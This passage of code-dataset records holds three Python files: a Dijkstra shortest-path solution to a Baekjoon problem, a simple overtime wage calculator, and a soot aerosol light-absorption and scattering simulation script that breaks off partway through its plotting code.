+{"seq_id":"12492267705","text":"import sys\r\nimport heapq\r\n\r\ninput = sys.stdin.readline\r\n\r\nN = int(input()) # number of nodes\r\nM = int(input()) # number of edges\r\nlst = [[] for _ in range(N+1)]\r\ndis = [int(1e9)] * (N+1)\r\n\r\nfor _ in range(M):\r\n    u,v,w = map(int, input().split())\r\n    lst[u].append((v,w))\r\n\r\ns,e = map(int, input().split())\r\n\r\nq = [(s,0)]\r\ndis[s] = 0\r\n\r\nwhile q:\r\n    n, v = heapq.heappop(q)\r\n\r\n    if dis[n] >= v:\r\n        for node, V in lst[n]:\r\n            tmp = V + v\r\n            if tmp < dis[node]:\r\n                dis[node] = tmp\r\n                heapq.heappush(q, (node, tmp))\r\n\r\nprint(dis[e])","repo_name":"song7351/baekjoonhub","sub_path":"백준/Gold/1916. 최소비용 구하기/최소비용 구하기.py","file_name":"최소비용 구하기.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"}
+{"seq_id":"38266801364","text":"\n\n\n\n# Make a Program.\n# If someone works over 40 hours, add message they are due overtime\n# Add message of the wage\n# Overtime = 110% of the standard wage\n\nwage = float(input(\"Please enter your wage: \"))\nhours_worked = float(input(\"Please enter the total hours you worked this week: \"))\n\novertime_wage = wage * 1.10\n\nif hours_worked > 40:\n    regular_pay = wage * 40\n    overtime_hours = hours_worked - 40\n    overtime_amount = overtime_hours * overtime_wage\n    total_pay = regular_pay + overtime_amount\n    print('You have worked more than 40 hours this week.')\n    print(f'You have earned the overtime amount of {overtime_amount}')\n    print(f'Your total pay is {total_pay}')\nelse:\n    total_regular_pay = wage * hours_worked\n    print(f\"You have earned {total_regular_pay}\")\n\n\n\n\n","repo_name":"Shelby86/Python_Work","sub_path":"day1_5.py","file_name":"day1_5.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"}
+{"seq_id":"11779772934","text":"# Programmed by Keyhan Babaee Under Prof. Steven Rogak supervision, https://github.com/KeyhanB\n# Version 1.4\n# June 2019\nimport Functions as FN\nimport os\nimport numpy as np\nfrom math import pi\nfrom math import log\n\nimport logging\n\n####### Logging Parameters\nlogging.basicConfig(format='%(asctime)s, %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p', filename='Log.txt', level=logging.INFO, filemode='w')\n##############\n\nif __name__ == \"__main__\":\n\n    logging.info(\"Program Started!\")\n    script_dir = os.path.dirname(os.path.realpath('__file__'))\n    Graph_Folder = \"Graph Output\"\n    Results_Folder = \"Results\"\n\n
    ####################### Aggregate Distribution Setting\n\n    Sample_Total_Number_Concentration = 5000  # Sample total concentration #/cm^3\n    Sample_LogN_D_Median_Min = 150  # Smallest median diameter of computation (nm)\n    Sample_LogN_D_Median_Max = 350  # Largest median diameter of computation (nm)\n    Sample_LogN_D_Median_Bins = 1  # Number of steps\n\n    Sample_LogN_Sigma_Min = 1.3  # Smallest Sample Sigma G\n    Sample_LogN_Sigma_Max = 1.9  # Largest Sample Sigma G\n    Sample_LogN_Sigma_Bins = 2  # Number of steps\n\n    ####################### Aggregate Distribution bounds\n\n    Sample_Sigma_Bound = 3  # Number of Sigma G to cover\n    Sample_Sigma_Bins = 124  # Number of bins\n\n
    ####################### Effective Density\n\n    Eff_dm_Min = 2.56  # Smallest mass mobility exponent for the result to be in kg/m^3\n    Eff_dm_Max = 2.8  # Largest mass mobility exponent for the result to be in kg/m^3\n    Eff_dm_Bins = 1  # Number of bins\n\n    ####################### Effective Density for 100nm aggregate\n\n    Eff_rho_100nm_Min = 502  # Smallest effective Density of 100nm aggregate in kg/m^3\n    Eff_rho_100nm_Max = 650  # Largest effective Density of 100nm aggregate in kg/m^3\n    Eff_rho_100nm_Bins = 1  # Number of bins\n\n    Soot_Material_Density = 1800  # in kg/m^3\n\n    ####################### Prefactor and projected area exponent of the aggregate\n\n    Primary_D_Alpha = 1.1\n    Primary_K_Alpha = 1.13\n\n    #######################\n\n    Primary_Sigma_da_CTE_Min = 1  # Smallest Sigma G around specific aggregate mobility diameter\n    Primary_Sigma_da_CTE_Max = 1.4  # Largest Sigma G around specific aggregate mobility diameter\n    Primary_Sigma_da_CTE_Bins = 2  # Number of bins\n\n    ####################### Primary Particle size distribution options\n\n    Primary_Sigma_da_CTE_Bound = 3  # Number of Sigma G to cover\n    Primary_Sigma_da_CTE_Nt = 75 + 1  # Number of bins\n\n
    ####################### Obsolete Variables\n\n    # Soot_Primary_Agg_dp_sigma = 1  # Geometric std of primary particles within aggregate\n    # Primary_Betha = 0.9\n    # Soot_Fractal_D_mc = 0.52  # Fractal Properties for continuum regime\n    # Soot_Prefactor_k_mc = 0.85 + (0.03 * Soot_Primary_Agg_dp_sigma ** (4.4))  # Fractal continuum regime\n    # Soot_Fractal_D_mc_RDG = 1 / Soot_Fractal_D_mc\n    # Soot_Prefactor_k_mc_RDG = (Primary_Betha / Soot_Prefactor_k_mc) ** (1 / Soot_Fractal_D_mc)\n\n    ####################### RDG Variables\n\n    Soot_Fractal_D_mc_RDG = 1.78\n    Soot_Prefactor_k_mc_RDG = 1.3\n\n
    ####################### Refractive index and Wave Parameters\n\n    Soot_Refractive_Index = 2 - 1j  # Complex refractive index\n    Wave_Length = 870 * 1e-9  # nm\n    Wave_Number = 2 * pi / Wave_Length  # k\n    Soot_Complex = (((Soot_Refractive_Index ** 2) - 1) / ((Soot_Refractive_Index ** 2) + 2))\n    Soot_FM = (abs(Soot_Complex)) ** 2\n    Soot_EM = Soot_Complex.imag\n\n
    ####################### Scattering Parameters\n\n    Theta_Number = 180  # Number of bins in Theta\n    Phi_Number = 180  # Number of bins in Phi\n    Theta_Start = 0  # Angle Start for Theta\n    Theta_Finish = pi  # Angle Finish for Theta\n    Phi_Start = 0  # Angle Start for Phi\n    Phi_Finish = 2 * pi  # Angle Finish for Phi\n    Theta_Radian = np.linspace(Theta_Start, Theta_Finish, num=Theta_Number)  # Theta List\n    Phi_Radian = np.linspace(Phi_Start, Phi_Finish, Phi_Number)  # Phi List\n    Theta_Diff = abs((Theta_Finish - Theta_Start) / Theta_Number)  # Delta Theta\n    Phi_Diff = abs((Phi_Finish - Phi_Start) / Phi_Number)  # Delta Phi\n    # alpha=2*pi*radius/lambda\n\n    ####################### Detail Figures\n\n    Figure_Enable = 1  # 0 for disable and 1 for enable\n\n
    ####################### List Generation\n\n    Sample_Sigma_List = np.linspace(Sample_LogN_Sigma_Min, Sample_LogN_Sigma_Max, num=Sample_LogN_Sigma_Bins)\n    Sample_D_Median_List = np.linspace(Sample_LogN_D_Median_Min, Sample_LogN_D_Median_Max, num=Sample_LogN_D_Median_Bins)\n    Eff_dm_List = np.linspace(Eff_dm_Min, Eff_dm_Max, num=Eff_dm_Bins)\n    Eff_rho_100nm_List = np.linspace(Eff_rho_100nm_Min, Eff_rho_100nm_Max, num=Eff_rho_100nm_Bins)\n    Primary_Sigma_da_CTE_List = np.linspace(Primary_Sigma_da_CTE_Min, Primary_Sigma_da_CTE_Max, num=Primary_Sigma_da_CTE_Bins)\n    logging.info(\"Program Initiated!\")\n\n
    ####################### Plot options\n\n    Sample_Diameter_Min = 50  # min diameter in nm for plotting\n    Sample_Diameter_Max = 2100  # max diameter in nm for plotting\n    Primary_Y_Min = 5  # in nm for plotting\n    Primary_Y_Max = 50  # in nm for plotting\n\n    ########### Labels\n\n    X_LabelA1 = 'Mobility-equivalent Diameter (nm)'\n\n    Y_LabelA1 = 'dN/dLogDm, (#/cm' + \"$^{}$\".format(3) + ')'\n    Y_LabelA2 = \"Primary Particle Diameter-dp(nm)\"\n    Y_LabelA3 = 'Absorption Cross Section(m' + \"$^{}$\".format(2) + '/dLogDm' + ')'\n    Y_LabelA4 = \"Absorption Efficiency\"\n    Y_LabelA5 = \"Scattering Efficiency\"\n    Y_LabelA6 = 'Scattering Cross Section(m' + \"$^{}$\".format(2) + '/dLogDm' + ')'\n    Y_LabelA7 = \"Sample Mass(kg/dLogDm)\"\n    Y_LabelA8 = 'Effective Density (kg/m' + \"$^{}$\".format(3) + ')'\n    Y_LabelA9 = \"SSA\"\n\n    Y_LabelB1 = \"Aggregate Mass Average1\"\n    Y_LabelB2 = \"Aggregate Mass Average2\"\n    Y_LabelB3 = 'MAC(m' + \"$^{}$\".format(2) + '/g' + ')'\n    Y_LabelB4 = 'MSC(m' + \"$^{}$\".format(2) + '/g' + ')'\n    logging.info(\"Labels Created!\")\n\n    ####################### Saving Parameters\n\n    
Save_Situation = []\n Save_Diameter = {}\n Save_LogN_Sample_SizeD = {}\n Save_Soot_Primary_Diameter_Median_Nano = {}\n Save_Absorption_Cross_Section_Sample_dlnDp = {}\n Save_Primary_Diameter_Bank = {}\n Save_Primary_Number_Bank = {}\n Save_Primary_Probability_Bank = {}\n Save_Absorption_Efficiency_Sample = {}\n Save_Differential_Scattering_Cross_Section_Full_dlnDp = {}\n Save_Scattering_Efficiency_Sample = {}\n Save_SSA_Distribution = {}\n Save_SSA = {}\n Save_Scattering_Cross_Section_Total_Distribution_dlnDp = {}\n Save_Effective_Density = {}\n Save_Mass_Sample_1 = {}\n Save_Mass_Sample_2 = {}\n Save_MAC = {}\n Save_MSC_Diff = {}\n Save_MAC_Distribution = {}\n Save_MSC_Distribution = {}\n Save_MSC_Total = {}\n Counter = 0\n\n ####################### Main Loops\n\n for i1 in range(Sample_LogN_D_Median_Bins): # Sample Median Loop\n for i2 in range(Sample_LogN_Sigma_Bins): # Sample Sigma Loop\n for i3 in range(Eff_dm_Bins): # Effective Density Dm Loop\n for i4 in range(Eff_rho_100nm_Bins): # Effective Density for 100nm aggregate Loop\n for i6 in range(Primary_Sigma_da_CTE_Bins): # Primary Diameter Sigma Loop\n\n Sample_D_Median = Sample_D_Median_List[i1]\n Sample_Sigma = Sample_Sigma_List[i2]\n Eff_dm = Eff_dm_List[i3]\n Eff_rho_100nm = Eff_rho_100nm_List[i4]\n Primary_Sigma_da_CTE = Primary_Sigma_da_CTE_List[i6]\n\n Eff_k = FN.Effective_Density_K_FromRho100nm(Eff_dm, Eff_rho_100nm)\n Primary_D_TEM = FN.DTEM_FromEffectiveDensity_D_Alpha(Primary_D_Alpha, Eff_dm)\n Primary_Diameter_100nm = FN.Primary_dp100nm(Eff_rho_100nm, Primary_K_Alpha, Soot_Material_Density, Primary_D_Alpha)\n\n Counter += 1\n\n Situation = f\"S_Median Diameter={round(Sample_D_Median, 1)} (nm)- S_Sigma={round(Sample_Sigma, 1)}- Dm={round(Eff_dm, 2)}- k={round(Eff_k, 2)}- rho_100nm={round(Eff_rho_100nm, 1)}- D_TEM={round(Primary_D_TEM, 2)}- P100nm_Diam={round(Primary_Diameter_100nm * 10 ** 9, 1)} (nm)- P_Sigma={round(Primary_Sigma_da_CTE, 2)}\"\n Save_Situation.append(Situation)\n Graph_Folder_Situation = Graph_Folder + \"/\" + Situation\n\n Diameter_Meter, Diameter_Log, Diameter_Nano = FN.Bins_LogN_Distributed(Median_Diameter=Sample_D_Median * (10 ** (-9)), Sigma_G=Sample_Sigma, Sigma_G_Bound=Sample_Sigma_Bound, Total_Number_Bins=Sample_Sigma_Bins)\n\n LogN_Sample_SizeDistribution_Plain = []\n LogN_Sample_SizeDistribution = []\n\n Save_Diameter[Situation] = Diameter_Nano[:-1]\n\n SUM = 0\n SUM1 = 0\n logging.info(f\"Sample's particle bins generated:{Situation}:Sigma Bound:{Sample_Sigma_Bound}: {Diameter_Nano}\")\n\n ########## Number Concentration\n\n for k in range(Sample_Sigma_Bins - 1):\n LogN_Sample_SizeDistribution_Plain.append(FN.LogN_Distribution(Median=Sample_D_Median, SigmaG=Sample_Sigma, Dp2=Diameter_Nano[k + 1], Dp1=Diameter_Nano[k]))\n LogN_Sample_SizeDistribution.append(LogN_Sample_SizeDistribution_Plain[k] * Sample_Total_Number_Concentration)\n SUM += LogN_Sample_SizeDistribution_Plain[k]\n SUM1 += LogN_Sample_SizeDistribution[k]\n\n logging.info(f\"Sample's particle bins populated:{Situation}:Sigma Bound:{Sample_Sigma_Bound}: {LogN_Sample_SizeDistribution_Plain}\")\n logging.info(f\"LogNormal Check:{Situation}:Sigma Bound:{Sample_Sigma_Bound}: {SUM}: {SUM1}\")\n\n Save_LogN_Sample_SizeD[Situation] = LogN_Sample_SizeDistribution\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"NumberConcentration\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], 
Y_array=LogN_Sample_SizeDistribution, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_Legend=\"Number Concentration,\\nTotal Conc.= \" + str(round(Sample_Total_Number_Concentration, 1)), Y_label1=Y_LabelA1,\n Plot_Title=Situation)\n\n ########## Primary Particle Size\n\n Soot_Primary_Diameter_Median_meter = []\n Soot_Primary_Diameter_Median_Nano = []\n for k in range(Sample_Sigma_Bins - 1):\n Soot_Primary_Diameter_Median_meter.append(FN.Primary_Particle_Size_meter(dm_meter=Diameter_Meter[k], dp100_meter=Primary_Diameter_100nm, Dtem=Primary_D_TEM))\n Soot_Primary_Diameter_Median_Nano.append(Soot_Primary_Diameter_Median_meter[k] * 10 ** 9)\n logging.info(f\"Primary Particle Diameter(m):{Situation}:Sigma Bound:{Sample_Sigma_Bound}: {Soot_Primary_Diameter_Median_Nano}\")\n\n Save_Soot_Primary_Diameter_Median_Nano[Situation] = Soot_Primary_Diameter_Median_Nano\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"PrimaryPS\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Soot_Primary_Diameter_Median_Nano, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, Y_Min=Primary_Y_Min, Y_Max=Primary_Y_Max, X_Label=X_LabelA1, Y_Legend=\"Primary Particle Size\", Y_label1=Y_LabelA2, Plot_Title=Situation)\n\n ########## Finding Primary Particle Number and Size\n\n Primary_Diameter_Bank = []\n Primary_Number_Bank = []\n Primary_Probability_Bank = []\n Aggregate_Mass_Bank = []\n\n SUM2 = []\n for k in range(Sample_Sigma_Bins - 1):\n SUM_Temp = 0\n Primary_Diameter, Primary_Number, Primary_Probability, Aggregate_Mass_array = FN.Primary_LogN_Generator_Mass(dp_Median_meter=Soot_Primary_Diameter_Median_meter[k], Sigma_g_Primary=Primary_Sigma_da_CTE, Sigma_g_Number=Primary_Sigma_da_CTE_Bound, Number_Points=Primary_Sigma_da_CTE_Nt, da_meter=Diameter_Meter[k],\n Eff_dm=Eff_dm, Eff_k=Eff_k, rho_cte=Soot_Material_Density)\n Primary_Diameter_Bank.append(Primary_Diameter)\n Primary_Number_Bank.append(Primary_Number)\n Primary_Probability_Bank.append(Primary_Probability)\n Aggregate_Mass_Bank.append(Aggregate_Mass_array)\n\n for m in range(len(Primary_Probability)):\n SUM_Temp += Primary_Probability[m]\n SUM2.append(SUM_Temp)\n logging.debug(f\"Primary Particle Diameter(m):{Situation}:Sigma Bound:{Sample_Sigma_Bound}: {Primary_Diameter}\")\n logging.debug(f\"Primary Particle Number:{Situation}:Sigma Bound:{Sample_Sigma_Bound}: {Primary_Number}\")\n # FN.Fig_Plot_3D_Show_XCte(Diameter_Nano[:-1], Primary_Diameter_Bank, Primary_Probability_Bank)\n logging.info(f\"Primary Particle Probability Check:{Situation}:Sigma Bound:{Sample_Sigma_Bound}: {SUM2}\")\n\n Save_Primary_Diameter_Bank[Situation] = Primary_Diameter_Bank\n Save_Primary_Number_Bank[Situation] = Primary_Number_Bank\n Save_Primary_Probability_Bank[Situation] = Primary_Probability_Bank\n\n ########### Absorption RDG\n\n Absorption_Cross_Section_Sample = []\n Absorption_Cross_Section = 0\n Absorption_Cross_Section_Sample_dlnDp = []\n\n for k in range(Sample_Sigma_Bins - 1):\n Absorption_Cross_Section_Specific_Particle_Size = 0\n for p in range(Primary_Sigma_da_CTE_Nt - 1):\n Absorption_Cross_Section_Agg = FN.RDG_Absorption(K=Wave_Number, N=Primary_Number_Bank[k][p], Dp=Primary_Diameter_Bank[k][p], E=Soot_EM) # within aggregate\n Absorption_Cross_Section_Specific_Particle_Size += Absorption_Cross_Section_Agg * Primary_Probability_Bank[k][p]\n\n ABS = 
Absorption_Cross_Section_Specific_Particle_Size * LogN_Sample_SizeDistribution[k]\n # Absorption_Cross_Section_Sample_dlnDp.append(ABS / (log(Diameter_Nano[k + 1]) - log(Diameter_Nano[k])))\n Absorption_Cross_Section_Sample_dlnDp.append(ABS / (LogN_Sample_SizeDistribution[k]))\n Absorption_Cross_Section_Sample.append(ABS)\n Absorption_Cross_Section += ABS\n\n Save_Absorption_Cross_Section_Sample_dlnDp[Situation] = Absorption_Cross_Section_Sample_dlnDp\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"ABSCross\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Absorption_Cross_Section_Sample_dlnDp, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1,\n Y_Legend=\"Absorption Cross Section=\\n\" + str(round(Absorption_Cross_Section * 10 ** 12, 2)) + \" um\" + \"$^{}$\".format(2), Y_label1=Y_LabelA3,\n Plot_Title=Situation)\n ########### Absorption EFF\n\n Absorption_Efficiency_Sample = []\n # Absorption_Efficiency_Sample_dlnDp = []\n\n for k in range(Sample_Sigma_Bins - 1):\n Absorption_Efficiency_Sample.append(FN.Abs_Scatt_Eff(CrossSection=Absorption_Cross_Section_Sample[k] / LogN_Sample_SizeDistribution[k], dm=Diameter_Meter[k]))\n # Absorption_Efficiency_Sample_dlnDp.append(Absorption_Efficiency_Sample[k])\n\n Save_Absorption_Efficiency_Sample[Situation] = Absorption_Efficiency_Sample\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"ABSEff\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Absorption_Efficiency_Sample, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_Legend=\"Absorption Efficiency\", Y_label1=Y_LabelA4, Plot_Title=Situation)\n\n ########### Scattering RDG\n ########### Differential\n\n Differential_Scattering_Cross_Section_Full = []\n Differential_Scattering_Cross_Section_Full_dlnDp = []\n Scattering_Cross_Section_Diff_Tot = 0\n qDp_Full = []\n for k in range(Sample_Sigma_Bins - 1):\n qDp_Temp = []\n Differential_Scattering_Cross_Section_T = 0\n for t in range(Theta_Number):\n q = FN.Scattering_Wave_Vector(WaveLength_meter=Wave_Length, Theta_radian=Theta_Radian[t])\n qDp_Temp.append(q * Soot_Primary_Diameter_Median_meter[k])\n Differential_Scattering_Cross_Section_Specific_Particle_Size = 0\n for p in range(Primary_Sigma_da_CTE_Nt - 1):\n Differential_Scattering_Cross_Section_Agg = FN.RDG_Def_Scattering(K=Wave_Number, N=Primary_Number_Bank[k][p], Dp=Primary_Diameter_Bank[k][p], q=q, F=Soot_FM, D_RDG=Soot_Fractal_D_mc_RDG, K_RDG=Soot_Prefactor_k_mc_RDG, Formula=2)\n Differential_Scattering_Cross_Section_Specific_Particle_Size += Differential_Scattering_Cross_Section_Agg * Primary_Probability_Bank[k][p]\n\n Differential_Scattering_Cross_Section_T += FN.Diff_Integral_Phi(Differential_Scattering_Cross_Section_Specific_Particle_Size, Phi_Radian, Theta_Radian[t], Theta_Diff, Phi_Diff)\n\n qDp_Full.append(qDp_Temp)\n Diff_Scatter = Differential_Scattering_Cross_Section_T * LogN_Sample_SizeDistribution[k]\n Differential_Scattering_Cross_Section_Full.append(Diff_Scatter)\n # Differential_Scattering_Cross_Section_Full_dlnDp.append(Diff_Scatter / (log(Diameter_Nano[k + 1]) - log(Diameter_Nano[k])))\n Differential_Scattering_Cross_Section_Full_dlnDp.append(Diff_Scatter / (LogN_Sample_SizeDistribution[k]))\n 
Scattering_Cross_Section_Diff_Tot += Diff_Scatter\n\n Save_Differential_Scattering_Cross_Section_Full_dlnDp[Situation] = Differential_Scattering_Cross_Section_Full_dlnDp\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"ScatterDiffCross\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Differential_Scattering_Cross_Section_Full_dlnDp, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1,\n Y_Legend=\"Total Scattering Cross Section (Differential)=\\n\" + str(round(Scattering_Cross_Section_Diff_Tot * 10 ** 12, 2)) + \" um\" + \"$^{}$\".format(2), Y_label1=Y_LabelA6, Plot_Title=Situation)\n\n ########### Scattering EFF\n\n Scattering_Efficiency_Sample = []\n # Scattering_Efficiency_Sample_dlnDp = []\n\n for k in range(Sample_Sigma_Bins - 1):\n Scattering_Efficiency_Sample.append(FN.Abs_Scatt_Eff(CrossSection=Differential_Scattering_Cross_Section_Full[k] / LogN_Sample_SizeDistribution[k], dm=Diameter_Meter[k]))\n # Scattering_Efficiency_Sample_dlnDp.append(Scattering_Efficiency_Sample[k])\n\n Save_Scattering_Efficiency_Sample[Situation] = Scattering_Efficiency_Sample\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"Scattering_Eff\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Scattering_Efficiency_Sample, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_Legend=\"Scattering Efficiency\", Y_label1=Y_LabelA5, Plot_Title=Situation)\n\n ########### SSA Distribution\n\n SSA = []\n\n for k in range(Sample_Sigma_Bins - 1):\n SSA.append(FN.SSA_Calculator(Scattering_CS=Differential_Scattering_Cross_Section_Full[k], Absorption_CS=Absorption_Cross_Section_Sample[k]))\n # Scattering_Efficiency_Sample_dlnDp.append(Scattering_Efficiency_Sample[k])\n\n Save_SSA_Distribution[Situation] = SSA\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"SSA\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=SSA, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_Legend=\"SSA\", Y_label1=Y_LabelA9, Plot_Title=Situation)\n\n ########### Total Scattering\n\n Scattering_Cross_Section_Total_Distribution = []\n Scattering_Cross_Section_Total_Distribution_dlnDp = []\n Scattering_Cross_Section_Total = 0\n for k in range(Sample_Sigma_Bins - 1):\n\n Scattering_Cross_Section_Total_Specific_Particle_Size = 0\n for p in range(Primary_Sigma_da_CTE_Nt - 1):\n Scattering_Cross_Section_Total_Agg = FN.RDG_Total_Scattering(K=Wave_Number, N=Primary_Number_Bank[k][p], Dp=Primary_Diameter_Bank[k][p], F=Soot_FM, D_RDG=Soot_Fractal_D_mc_RDG, K_RDG=Soot_Prefactor_k_mc_RDG, Formula=2)\n Scattering_Cross_Section_Total_Specific_Particle_Size += Scattering_Cross_Section_Total_Agg * Primary_Probability_Bank[k][p]\n\n Total_Scatter = Scattering_Cross_Section_Total_Specific_Particle_Size * LogN_Sample_SizeDistribution[k]\n Scattering_Cross_Section_Total_Distribution.append(Total_Scatter)\n Scattering_Cross_Section_Total_Distribution_dlnDp.append(Total_Scatter / (log(Diameter_Nano[k + 1]) - log(Diameter_Nano[k])))\n Scattering_Cross_Section_Total += Total_Scatter\n\n 
Save_Scattering_Cross_Section_Total_Distribution_dlnDp[Situation] = Scattering_Cross_Section_Total_Distribution_dlnDp\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"ScatterTotCross\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Scattering_Cross_Section_Total_Distribution_dlnDp, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1,\n Y_Legend=\"Scattering Cross Section (Total)=\\n\" + str(round(Scattering_Cross_Section_Total * 10 ** 12, 2)) + \" um\" + \"$^{}$\".format(2),\n Y_label1=Y_LabelA6, Plot_Title=Situation)\n\n ########### MAC_MSC\n\n Mass_Sample_1 = []\n Mass_Sample_2 = []\n Density = []\n Total_Mass_1 = 0\n Total_Mass_2 = 0\n\n Aggregate_Mass_Ave1 = []\n Aggregate_Mass_Ave2 = []\n MAC_Distribution = []\n MSC_Distribution = []\n\n for k in range(Sample_Sigma_Bins - 1):\n Density.append(FN.Effective_Density(K=Eff_k, Dm=Eff_dm, da=Diameter_Meter[k]))\n Aggregate_Mass_Ave1.append(FN.Mass_Calc(rho=Density[k], da=Diameter_Meter[k]))\n Mass_Aggregate_Ave = 0\n for p in range(Primary_Sigma_da_CTE_Nt - 1):\n Mass_Aggregate_Ave += Aggregate_Mass_Bank[k][p] * Primary_Probability_Bank[k][p]\n Aggregate_Mass_Ave2.append(Mass_Aggregate_Ave)\n\n MAC_Distribution.append(Absorption_Cross_Section_Sample[k] / (Aggregate_Mass_Ave2[k] * LogN_Sample_SizeDistribution[k] * 1000))\n MSC_Distribution.append(Differential_Scattering_Cross_Section_Full[k] / (Aggregate_Mass_Ave2[k] * LogN_Sample_SizeDistribution[k] * 1000))\n\n Mass_Effective1 = Aggregate_Mass_Ave1[k] * LogN_Sample_SizeDistribution[k]\n Mass_Effective2 = Aggregate_Mass_Ave2[k] * LogN_Sample_SizeDistribution[k]\n\n Mass_Sample_1.append(Mass_Effective1 / (log(Diameter_Nano[k + 1]) - log(Diameter_Nano[k])))\n Mass_Sample_2.append(Mass_Effective2 / (log(Diameter_Nano[k + 1]) - log(Diameter_Nano[k])))\n Total_Mass_1 += Mass_Effective1\n Total_Mass_2 += Mass_Effective2\n\n Total_Mass_1 = Total_Mass_1 * 1000 # kg to g\n Total_Mass_2 = Total_Mass_2 * 1000 # kg to g\n\n MAC_1 = Absorption_Cross_Section / Total_Mass_1\n MSC_1 = Scattering_Cross_Section_Total / Total_Mass_1\n MSC_Diff_1 = Scattering_Cross_Section_Diff_Tot / Total_Mass_1\n SSA = Scattering_Cross_Section_Diff_Tot / (Scattering_Cross_Section_Diff_Tot + Absorption_Cross_Section)\n\n MAC_2 = Absorption_Cross_Section / Total_Mass_2\n MSC_2 = Scattering_Cross_Section_Total / Total_Mass_2\n MSC_Diff_2 = Scattering_Cross_Section_Diff_Tot / Total_Mass_2\n\n Save_Effective_Density[Situation] = Density\n Save_Mass_Sample_1[Situation] = Mass_Sample_1\n Save_Mass_Sample_2[Situation] = Mass_Sample_2\n Save_MAC_Distribution[Situation] = MAC_Distribution\n Save_MSC_Distribution[Situation] = MSC_Distribution\n Save_MAC[Situation] = str(MAC_1) + \", \" + str(MAC_2)\n Save_MSC_Total[Situation] = str(MSC_1) + \", \" + str(MSC_2)\n Save_MSC_Diff[Situation] = str(MSC_Diff_1) + \", \" + str(MSC_Diff_2)\n Save_SSA[Situation] = SSA\n\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"EffectiveDensity\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Density, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA8, Plot_Title=Situation)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + 
\"Aggregate_Mass_Ave1\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Aggregate_Mass_Ave1, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelB1, Plot_Title=Situation)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"Aggregate_Mass_Ave2\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Aggregate_Mass_Ave2, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelB2, Plot_Title=Situation)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"MAC_Distribution\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=MAC_Distribution, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, 